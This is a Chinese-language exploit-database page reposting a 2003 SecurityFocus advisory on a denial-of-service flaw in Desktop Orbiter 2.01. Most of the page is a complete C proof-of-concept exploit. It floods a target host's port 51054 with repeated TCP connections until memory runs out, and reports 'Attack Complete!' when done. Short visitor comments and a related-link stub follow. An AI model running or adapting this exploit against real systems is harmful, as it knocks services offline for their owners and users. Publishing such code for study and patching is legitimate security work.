Desktop Orbiter 2.0 1 – Resource Exhaustion (Denial of Service)
漏洞ID | 1053914 | 漏洞类型 | |
发布时间 | 2003-05-30 | 更新时间 | 2003-05-30 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Windows | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/7759/info
A denial of service vulnerability has been reported for Desktop Orbiter. The vulnerability exists due to the way the application handles connections. Specifically, for every open connection, a snapshot preview of the desktop is loaded into memory. Thus, numerous connections would result in a consumption of all available memory resources.
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <unistd.h>
#define PORT 51054
int main(int argc, char *argv[]){
int sockfd;
struct hostent *he;
struct sockaddr_in their_addr;
int c;
int n;
char *host = NULL;
int cnt=1;
if(argc < 2 ) {
printf("Usage:%s -h <host>n",argv[0]);
exit(0);
}
while((n = getopt(argc, argv, "h")) != -1) {
switch(n) {
case 'h':
host = optarg;
break;
default:
printf("Bad Inputn");
exit(0);
}
}
if ((he = gethostbyname(argv[2])) == NULL)
{
herror("gethostbyname");
exit(1);
}
their_addr.sin_family = AF_INET;
their_addr.sin_port = htons(PORT);
their_addr.sin_addr = *((struct in_addr *) he->h_addr);
bzero(&(their_addr.sin_zero), 8);
printf
("nntt#########################################################n");
printf("tt# Proof of Concept by Luca Ercoli [email protected] #n");
printf("tt# Desktop Orbiter 2.01 Denial of Service #n");
printf
("tt#########################################################nn");
printf("nAttacking....na");
if ((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1)
{
perror("socket");
exit(1);
}
if (connect (sockfd, (struct sockaddr *) &their_addr,sizeof(struct
sockaddr)) == -1)
{
perror("connect");
exit(0);
}
for (c=0;c<99500;c++){
if ((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1)
{
perror("socket");
exit(1);
}
if (connect (sockfd, (struct sockaddr *) &their_addr,
sizeof(struct sockaddr)) == -1)
{
printf("n[Attack status] Step %d/25 : Complete!",cnt);
if (cnt == 25) {
printf("nAttack Complete!nna");
exit(0);
}
cnt++;
sleep(1);
}
close(sockfd);
}
printf("n");
return 1;
}
相关推荐: Multiple Personal Firewall Vendor Outbound Packet Bypass Vulnerability
Multiple Personal Firewall Vendor Outbound Packet Bypass Vulnerability 漏洞ID 1102689 漏洞类型 Design Error 发布时间 2001-12-06 更新时间 2001-12…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666